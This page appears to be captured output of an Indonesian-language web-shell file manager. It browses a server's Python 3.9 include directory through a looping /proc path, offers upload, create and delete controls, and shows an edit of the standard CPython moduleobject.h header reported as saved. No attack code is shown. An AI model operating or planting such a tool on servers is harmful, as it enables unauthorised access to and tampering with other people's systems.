PATH: //proc/self/root/proc/thread-self/root/proc/self/root/usr/include/python3.9
FILE_BARU
CREATE
FOLDER_BARU
MKDIR
UPLOAD_FILE
GO
[ .. KEMBALI ]
📄 Python-ast.h
↓
X
📄 Python.h
↓
X
📄 abstract.h
↓
X
📄 asdl.h
↓
X
📄 ast.h
↓
X
📄 bitset.h
↓
X
📄 bltinmodule.h
↓
X
📄 boolobject.h
↓
X
📄 bytearrayobject.h
↓
X
📄 bytesobject.h
↓
X
📄 cellobject.h
↓
X
📄 ceval.h
↓
X
📄 classobject.h
↓
X
📄 code.h
↓
X
📄 codecs.h
↓
X
📄 compile.h
↓
X
📄 complexobject.h
↓
X
📄 context.h
↓
X
📁 cpython/
X
📄 datetime.h
↓
X
📄 descrobject.h
↓
X
📄 dictobject.h
↓
X
📄 dynamic_annotations.h
↓
X
📄 enumobject.h
↓
X
📄 errcode.h
↓
X
📄 eval.h
↓
X
📄 exports.h
↓
X
📄 fileobject.h
↓
X
📄 fileutils.h
↓
X
📄 floatobject.h
↓
X
📄 frameobject.h
↓
X
📄 funcobject.h
↓
X
📄 genericaliasobject.h
↓
X
📄 genobject.h
↓
X
📄 graminit.h
↓
X
📄 grammar.h
↓
X
📄 import.h
↓
X
📁 internal/
X
📄 interpreteridobject.h
↓
X
📄 intrcheck.h
↓
X
📄 iterobject.h
↓
X
📄 listobject.h
↓
X
📄 longintrepr.h
↓
X
📄 longobject.h
↓
X
📄 marshal.h
↓
X
📄 memoryobject.h
↓
X
📄 methodobject.h
↓
X
📄 modsupport.h
↓
X
📄 moduleobject.h
↓
X
📄 namespaceobject.h
↓
X
📄 node.h
↓
X
📄 object.h
↓
X
📄 objimpl.h
↓
X
📄 odictobject.h
↓
X
📄 opcode.h
↓
X
📄 osdefs.h
↓
X
📄 osmodule.h
↓
X
📄 parsetok.h
↓
X
📄 patchlevel.h
↓
X
📄 picklebufobject.h
↓
X
📄 py_curses.h
↓
X
📄 pyarena.h
↓
X
📄 pycapsule.h
↓
X
📄 pyconfig-64.h
↓
X
📄 pyconfig.h
↓
X
📄 pyctype.h
↓
X
📄 pydebug.h
↓
X
📄 pydtrace.h
↓
X
📄 pyerrors.h
↓
X
📄 pyexpat.h
↓
X
📄 pyfpe.h
↓
X
📄 pyframe.h
↓
X
📄 pyhash.h
↓
X
📄 pylifecycle.h
↓
X
📄 pymacconfig.h
↓
X
📄 pymacro.h
↓
X
📄 pymath.h
↓
X
📄 pymem.h
↓
X
📄 pyport.h
↓
X
📄 pystate.h
↓
X
📄 pystrcmp.h
↓
X
📄 pystrhex.h
↓
X
📄 pystrtod.h
↓
X
📄 pythonrun.h
↓
X
📄 pythread.h
↓
X
📄 pytime.h
↓
X
📄 rangeobject.h
↓
X
📄 setobject.h
↓
X
📄 sliceobject.h
↓
X
📄 structmember.h
↓
X
📄 structseq.h
↓
X
📄 symtable.h
↓
X
📄 sysmodule.h
↓
X
📄 token.h
↓
X
📄 traceback.h
↓
X
📄 tracemalloc.h
↓
X
📄 tupleobject.h
↓
X
📄 typeslots.h
↓
X
📄 ucnhash.h
↓
X
📄 unicodeobject.h
↓
X
📄 warnings.h
↓
X
📄 weakrefobject.h
↓
X
SAVING...
BERHASIL DIUBAH!
EDITING: moduleobject.h
/* Module object interface */ #ifndef Py_MODULEOBJECT_H #define Py_MODULEOBJECT_H #ifdef __cplusplus extern "C" { #endif PyAPI_DATA(PyTypeObject) PyModule_Type; #define PyModule_Check(op) PyObject_TypeCheck(op, &PyModule_Type) #define PyModule_CheckExact(op) Py_IS_TYPE(op, &PyModule_Type) #if !defined(Py_LIMITED_API) || Py_LIMITED_API+0 >= 0x03030000 PyAPI_FUNC(PyObject *) PyModule_NewObject( PyObject *name ); #endif PyAPI_FUNC(PyObject *) PyModule_New( const char *name /* UTF-8 encoded string */ ); PyAPI_FUNC(PyObject *) PyModule_GetDict(PyObject *); #if !defined(Py_LIMITED_API) || Py_LIMITED_API+0 >= 0x03030000 PyAPI_FUNC(PyObject *) PyModule_GetNameObject(PyObject *); #endif PyAPI_FUNC(const char *) PyModule_GetName(PyObject *); Py_DEPRECATED(3.2) PyAPI_FUNC(const char *) PyModule_GetFilename(PyObject *); PyAPI_FUNC(PyObject *) PyModule_GetFilenameObject(PyObject *); #ifndef Py_LIMITED_API PyAPI_FUNC(void) _PyModule_Clear(PyObject *); PyAPI_FUNC(void) _PyModule_ClearDict(PyObject *); PyAPI_FUNC(int) _PyModuleSpec_IsInitializing(PyObject *); #endif PyAPI_FUNC(struct PyModuleDef*) PyModule_GetDef(PyObject*); PyAPI_FUNC(void*) PyModule_GetState(PyObject*); #if !defined(Py_LIMITED_API) || Py_LIMITED_API+0 >= 0x03050000 /* New in 3.5 */ PyAPI_FUNC(PyObject *) PyModuleDef_Init(struct PyModuleDef*); PyAPI_DATA(PyTypeObject) PyModuleDef_Type; #endif typedef struct PyModuleDef_Base { PyObject_HEAD PyObject* (*m_init)(void); Py_ssize_t m_index; PyObject* m_copy; } PyModuleDef_Base; #define PyModuleDef_HEAD_INIT { \ PyObject_HEAD_INIT(NULL) \ NULL, /* m_init */ \ 0, /* m_index */ \ NULL, /* m_copy */ \ } struct PyModuleDef_Slot; #if !defined(Py_LIMITED_API) || Py_LIMITED_API+0 >= 0x03050000 /* New in 3.5 */ typedef struct PyModuleDef_Slot{ int slot; void *value; } PyModuleDef_Slot; #define Py_mod_create 1 #define Py_mod_exec 2 #ifndef Py_LIMITED_API #define _Py_mod_LAST_SLOT 2 #endif #endif /* New in 3.5 */ typedef struct PyModuleDef{ PyModuleDef_Base m_base; const char* m_name; const char* m_doc; Py_ssize_t m_size; PyMethodDef *m_methods; struct PyModuleDef_Slot* m_slots; traverseproc m_traverse; inquiry m_clear; freefunc m_free; } PyModuleDef; #ifdef __cplusplus } #endif #endif /* !Py_MODULEOBJECT_H */
SIMPAN PERUBAHAN